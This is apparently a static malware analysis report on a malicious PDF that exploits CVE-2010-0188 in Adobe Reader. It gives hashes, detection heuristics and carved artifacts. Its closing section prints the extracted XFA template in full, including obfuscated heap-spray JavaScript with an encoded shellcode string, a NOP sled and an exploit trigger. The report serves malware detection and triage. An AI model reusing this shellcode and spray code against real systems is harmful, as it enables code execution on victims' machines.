Malicious PDF — malware analysis report

Static analysis result for SHA-256 7d309a3dcc7fa599…

MALICIOUS

PDF

235.2 KB Created: 2010-02-23 12:29:53 -08:00 First seen: 2026-05-10
MD5: 203ed6e3e07225c51f9b19baf8ca3eb3 SHA-1: 11f42d1e58439b1dff5b16f64b1b0c0bd835127a SHA-256: 7d309a3dcc7fa599b0b8060e8155240044d2f6fe110ae97dc22d736b286a6123
348 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The sample is a PDF document that leverages CVE-2010-0188, an integer overflow vulnerability in Adobe Reader's XFA forms, to achieve code execution. The embedded JavaScript and XFA heap-spray exploit code indicate the intent to download and execute a secondary payload. The presence of a NOP sled in a flated image further supports the exploitation of a buffer overflow.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9852

Heuristics 14

  • Adobe Reader XFA LibTIFF integer overflow — CVE-2010-0188 critical CVE exact CVE_2010_0188
    An XFA image field carries a TIFF whose IFD has a malformed tag that overflows the LibTIFF parser (CVE-2010-0188).
  • Flate image XObject contains x86 NOP sled high CVE related PDF_FLATE_IMAGE_NOP_SLED
    PDF embeds a FlateDecode image XObject whose decoded bytes are dominated by x86 NOP instructions, alongside form or embedded-file delivery structures. This is exploit payload staging evidence and is related to Adobe Reader parser-exploit families, but it is not a unique CVE fingerprint by itself.
  • XFA JavaScript heap-spray exploit code critical PDF_XFA_HEAP_SPRAY
    PDF contains XFA script content with heap-spray or shellcode-like JavaScript markers such as large encoded word sequences, util.pack, large arrays, or spray variable names. This is a weaponised Adobe Reader exploit pattern, not a normal interactive form.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • PDF embedded file could not be fully decoded medium PDF_EMBEDDED_FILE_UNDECODED
    A declared PDF /EmbeddedFile stream uses filters that the scanner could not decode. The raw stream was carved for artifact triage because malformed or unsupported attachment filters can hide payload content from normal extraction.
  • Image-only document with action trigger (screenshot lure) medium PDF_IMAGE_LURE
    PDF has 2 image(s), only 1 text block(s), carries a click-outward action, and is only 235 KB — typical shape of a phishing lure where a full-page screenshot hides a clickable button that launches or submits to an attacker URL.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded script payload in PDF stream info PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://www.xfa.org/schema/xci/1.0/In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.4/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-data/1.0/In PDF document text
    • http://cgi.adobe.com/special/acrobat/updateReferenced by PDF JavaScript
    • http://ns.adobe.com/xdp/In PDF document text
    • http://www.xfa.org/schema/xfa-locale-set/2.7/In PDF document text
    • http://www.xfa.org/schema/xfa-locale-set/2.1/In PDF document text
    • http://ns.adobe.com/xtd/In PDF document text
    • http://www.xfa.org/schema/xfa-form/2.8/In PDF document text
    • http://www.w3.org/1999/xhtmlIn PDF document text
🗂 Part of campaign: shared payload 964b35fd2c 29 samples

Extracted artifacts 14

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_file_obj0002.bin pdf-embedded-file PDF EmbeddedFile object 2 at offset 0x19FA 85 bytes
SHA-256: c06dcd026a7ea0536b63e07ce688691b585339a3ab7ff59065e546b56308c7bb
embedded_file_obj0003.bin pdf-embedded-file PDF EmbeddedFile object 3 at offset 0x1AAC 1466 bytes
SHA-256: 0cae1494b9c99505bf126e683a1a8be36bc8d5e793ab829e266d6e2fd62ccac3
embedded_file_obj0004.bin pdf-embedded-file PDF EmbeddedFile object 4 at offset 0x1D6B 9148 bytes
SHA-256: 1b57e7c1e4bc1f8daf7cdf9c6223b19580c93789063a99232ed1cb040470df13
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
embedded_file_obj0005.bin pdf-embedded-file PDF EmbeddedFile object 5 at offset 0x290F 11740 bytes
SHA-256: f47c3dc8c4eeb64abc2cc332be719add15af6ce6dfdcdb477c08a1aefdbe7477
embedded_file_obj0006.bin pdf-embedded-file PDF EmbeddedFile object 6 at offset 0x2AD7 2928 bytes
SHA-256: 226eeacc5eecef2a05ca480f144ff6936594e20b5c7672e8f29f25c8bea65a56
embedded_file_obj0007.bin pdf-embedded-file PDF EmbeddedFile object 7 at offset 0x2E44 200 bytes
SHA-256: 4cb349134bdb5f1a1c03281df9b53128ebe947f235398a912a4f0a9f638b24d5
embedded_file_obj0008.bin pdf-embedded-file PDF EmbeddedFile object 8 at offset 0x2F37 835 bytes
SHA-256: d51b9fc28b592405fb598e711d1495e1421571073bc2e8542d55389768716c06
embedded_file_obj0009.bin pdf-embedded-file PDF EmbeddedFile object 9 at offset 0x3110 291 bytes
SHA-256: e65f1e07bc965092b3153e64a1e8777a909cc47a98c0e2a10d38c47def2e6652
regedit.exe pdf-embedded-file-undecodable PDF EmbeddedFile object 86 at offset 0x13B95; filter decode failed 132942 bytes
SHA-256: d2993b055a5d0b8475d1c3b25ab5eb956b3650ba7608d1a10e77a4a55af566a8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 8.00, consistent with packed or encrypted content.
xfa_image_rawvalue_000.tif pdf-xfa-image-tiff XFA image/rawValue TIFF payload near offset 0x36D6C 8538 bytes
SHA-256: 671a354149e0ee431b9ab639739547a82c1110f751869622d000c6e04bf7d45f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: NOP sled, heap spray 0x0C
stream_002_off000003e1.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x3E1 1532 bytes
SHA-256: f574e4d51594d1a8fd22e125b109b827c437aa898edc78babb62dbb93f8744f8
stream_003_off000005cc.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x5CC 870 bytes
SHA-256: 4a1aca004cf20431c9a66dce85404a6411a54d881a6c257882260ffc972a13eb
stream_008_off0000112a.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x112A 3024 bytes
SHA-256: 8358d835225babc82acbcbbf2cb07512b8fb3772c5b46ff5956d2c6d02da8c39
embedded_pdf_script_00034a58.bin pdf-embedded-script PDF raw stream script payload at offset 0x34A58 9163 bytes
SHA-256: 964b35fd2cf89dd55c1ec763fabaa19e720fcce510e60402ad1e45eecd2754e0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
<template xmlns="http://www.xfa.org/schema/xfa-template/2.4/" baseProfile="interactiveForms"><subform layout="tb" locale="en_US" name="topmostSubform"><pageSet><pageArea id="PageArea1" name="PageArea1"><contentArea h="792pt" name="ContentArea1" w="612pt" x="0pt" y="0pt"></contentArea><medium long="792pt" short="612pt" stock="custom"></medium></pageArea></pageSet><variables><script contentType="application/x-javascript" name="ADBE::FileAttachmentsCompatibility">/*var v = app.viewerVersion;
if (v &lt; 7)
{
	var n = 0;
	if (this.dataObjects != null)
		n = this.dataObjects.length;
	if (v &gt;= 5 &amp;&amp; v &lt; 6 &amp;&amp; n &gt; 0 &amp;&amp; (app.viewerVariation == "Full" || app.viewerVariation == "Fill-In"))
	{
		if (this.external)
			app.alert("This document has file attachments. To view the attachments, click the Save button to save a copy of the document, open the copy in Acrobat, and use the File &gt; Document Properties &gt; Embedded Data Objects menu.", 3, 0);
		else
			app.alert("This document has file attachments. Use the File &gt; Document Properties &gt; Embedded Data Objects menu to view the attachments.", 3, 0);
	}
	else if (v &gt;= 6 &amp;&amp; v &lt; 7)
	{
		if (n == 0)
		{
			var np = this.numPages;
			syncAnnotScan();
			for (var p = 0; p &lt; np &amp;&amp; n == 0; ++p)
			{
				var annots = this.getAnnots(p);
				if (annots != null)
				{
					for (var i = 0; i &lt; annots.length; ++i)
					{
						if (annots[i].type == "FileAttachment")
						{
							n = 1;
							break;
						}
					}
				}
			}
		}
		if (n &gt; 0)
		{
			if (this.external)
				app.alert("This document has file attachments. To view the attachments, click the black triangle at the top of the document window's vertical scrollbar and choose File Attachments.", 3, 0);
			else
				app.alert("This document has file attachments. Use the Document &gt; File Attachments menu to view the attachments.", 3, 0);
		}
	}
}
*/</script><script contentType="application/x-javascript" name="d">/*var  ____ = unescape;&#xD;
var  _c1 = 				"\x6c\x65\x6e\x67\x74\x68";&#xD;
function _____(__){var _='';for(var ___=0;___&lt;__[_c1];___+=4) _+='%'+'u'+__.substr(___,4);return _;}&#xD;
function 	rep(_	,	__)	{	var ___	=	""	;	while (	--_&gt;=	0) ___	+=	 __	;	return	 ___;}&#xD;
&#xD;
var		 sc=		____		(	_____("9090909090909090EB905E1a5B56068a303c1674E0c04604268aE480020f88c44303EB46E8e9FFe1FFff7466515a70437050707050506B6850644C504B6850776C714D5a6B5850474850794e4453625050705050787551684C4e50506270505050504B686C4f4978574778504978774450616F6f5757785048666C4e775943506C70584e644c615070507070494847544C614F4f574778704866764f5262594b4C67584e446b7150705070506948777470524F6f777768707876457a776150506C67684e544a7170705070707958776474724F4f4767587058664B6f67796D4f6F50584e54496150705070705958476458524F4f476768504856665165767A4f7041786e6458415050707070497867644C626F6f6767785058664F4169675A70684e686e74675150705050504948577450634F6f7767685078565572706b4F4f726c484e64465170505050707968575474636F4f6777587048566C5a48507A4d5667784e74554170707050504948774478536F4f47477850486648494E6f4A584E70586e4474617050505050597857444C734F4f475778504846546749686C6e6959584e64634170505050707958475470544F4f7777785048466E47784d524e5377786e44524170707070705958576444646F6f5757685078564D5a6B494D774F4d784e74417170705070507978674468646F4f577750616F6f677564736363766f46646D7867645046704576454F6f575548547358584f4F6f4447726f4D73707050417070705046674B4e7978477474504978574750466F6f575744707A4670546F4f67654C51794857446C455A7650706A4650704A5670706F6f574770666F4f777548734348584f6F4f44476B546A4670706D786F45505753754F4f475764704F6f57776C656F4f774750564F6f47454C624B684F7450677378696e70414B4857444C4550744148487346644E627A55487675674950514858476470635276507148695154775450526e6C4e6B6e4A417378506c48505948774464517064414848536A74556753566B6455574970717878476470624141505348696144476E50624e4C4e4F6f57776C454F4f774570526F70554842676F6f4F4f6F4f6378706c78507978674458714A767070786650687050707050705A6662705A7670704A465050785670705050707070644F4f477750716F6f47657462497877747476776c67544C466D547A65704950506A5650704D786F55704753557A6664504D486F654C7663756F6f576744666F4f676570634B68777458516B42575454617368586e58506B784F55747170435370637478445368786f50506557474f5A4670504D584F65506763754B584F6548416B524F65444163584B4e687063754F6f475764414F6f576774564F4f574570736F4f474754466F4f476568625A5670506F4f576750714F6f67556C637A5650504F4f4745445475756B684C6e47454B784D7768704B786D754C7066454B6853576C536B4854574E7178574350736f66754B58467750427350734f6343696c697441746D7a4370636c46757373564f4F706E4b70715A73626f74675850414c4E4c6D504350524f50446B4e514f4B534E6f4E455567454e4A756B584B6e6B586A75644273704D6d76564B486C706B744B584A456C5163704D4d6B7864704B586350754c6E454F556D65626c78507050486e476c6D6f4F4f6F6f43464A736C5551764E5255565857757670503030"));&#xD;
&#xD;
function uuu(){&#xD;
_ = rep(128, ____	(_____		("42424242424242424242"))) + sc;&#xD;
_0 = 			____		(	_____("0c0c0c0c"));&#xD;
_1 = 20	+_[_c1];&#xD;
while (_0[	_c1]&lt;_1) _0+=_0;&#xD;
_2	 = 	_0["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 	_1);&#xD;
_3 	=	 _0["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, _0[_c1	]-_1);&#xD;
while(_3[_c1]	 +  _1&lt;0x80000) _3 		= _3+	_3+_2;&#xD;
_4= new Array();&#xD;
for(i=0;i&lt;=192;i=i+1)	_4[i]				=_3		+_;&#xD;
}&#xD;
uuu();*/</script><?templateDesigner expand 1?></variables><subform h="792pt" name="Page1" w="612pt" x="0pt" y="0pt"><break before="pageArea" beforeTarget="#PageArea1"></break><bind match="none"></bind><field h="9.525mm" name="ImageField1" w="150.767mm" x="37.972mm" y="29.655mm"><ui><imageEdit></imageEdit></ui><event activity="ready" name="event__form_ready" ref="$form"><script contentType="application/x-javascript">var  ____ = unescape;
var  _c1 = 				"\x6c\x65\x6e\x67\x74\x68";
function _____(__){var _='';for(var ___=0;___&lt;__[_c1];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
function 	rep(_	,	__)	{	var ___	=	""	;	while (	--_&gt;=	0) ___	+=	 __	;	return	 ___;}

var		 sc=		____		(	_____("9090909090909090EB905E1a5B56068a303c1674E0c04604268aE480020f88c44303EB46E8e9FFe1FFff7466515a70437050707050506B6850644C504B6850776C714D5a6B5850474850794e4453625050705050787551684C4e50506270505050504B686C4f4978574778504978774450616F6f5757785048666C4e775943506C70584e644c615070507070494847544C614F4f574778704866764f5262594b4C67584e446b7150705070506948777470524F6f777768707876457a776150506C67684e544a7170705070707958776474724F4f4767587058664B6f67796D4f6F50584e54496150705070705958476458524F4f476768504856665165767A4f7041786e6458415050707070497867644C626F6f6767785058664F4169675A70684e686e74675150705050504948577450634F6f7767685078565572706b4F4f726c484e64465170505050707968575474636F4f6777587048566C5a48507A4d5667784e74554170707050504948774478536F4f47477850486648494E6f4A584E70586e4474617050505050597857444C734F4f475778504846546749686C6e6959584e64634170505050707958475470544F4f7777785048466E47784d524e5377786e44524170707070705958576444646F6f5757685078564D5a6B494D774F4d784e74417170705070507978674468646F4f577750616F6f677564736363766f46646D7867645046704576454F6f575548547358584f4F6f4447726f4D73707050417070705046674B4e7978477474504978574750466F6f575744707A4670546F4f67654C51794857446C455A7650706A4650704A5670706F6f574770666F4f777548734348584f6F4f44476B546A4670706D786F45505753754F4f475764704F6f57776C656F4f774750564F6f47454C624B684F7450677378696e70414B4857444C4550744148487346644E627A55487675674950514858476470635276507148695154775450526e6C4e6B6e4A417378506c48505948774464517064414848536A74556753566B6455574970717878476470624141505348696144476E50624e4C4e4F6f57776C454F4f774570526F70554842676F6f4F4f6F4f6378706c78507978674458714A767070786650687050707050705A6662705A7670704A465050785670705050707070644F4f477750716F6f47657462497877747476776c67544C466D547A65704950506A5650704D786F55704753557A6664504D486F654C7663756F6f576744666F4f676570634B68777458516B42575454617368586e58506B784F55747170435370637478445368786f50506557474f5A4670504D584F65506763754B584F6548416B524F65444163584B4e687063754F6f475764414F6f576774564F4f574570736F4f474754466F4f476568625A5670506F4f576750714F6f67556C637A5650504F4f4745445475756B684C6e47454B784D7768704B786D754C7066454B6853576C536B4854574E7178574350736f66754B58467750427350734f6343696c697441746D7a4370636c46757373564f4F706E4b70715A73626f74675850414c4E4c6D504350524f50446B4e514f4B534E6f4E455567454e4A756B584B6e6B586A75644273704D6d76564B486C706B744B584A456C5163704D4d6B7864704B586350754c6E454F556D65626c78507050486e476c6D6f4F4f6F6f43464A736C5551764E5255565857757670503030"));

function uuu(){
_ = rep(128, ____	(_____		("42424242424242424242"))) + sc;
_0 = 			____		(	_____("0c0c0c0c"));
_1 = 20	+_[_c1];
while (_0[	_c1]&lt;_1) _0+=_0;
_2	 = 	_0["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 	_1);
_3 	=	 _0["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, _0[_c1	]-_1);
while(_3[_c1]	 +  _1&lt;0x80000) _3 		= _3+	_3+_2;
_4= new Array();
for(i=0;i&lt;=192;i=i+1)	_4[i]				=_3		+_;
}
uuu();
ImageField1.value.image.href = "exploit.tif";

</script></event></field><?templateDesigner expand 1?></subform><?templateDesigner expand 1?></subform><?templateDesigner FormTargetVersion 24?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 95?></template>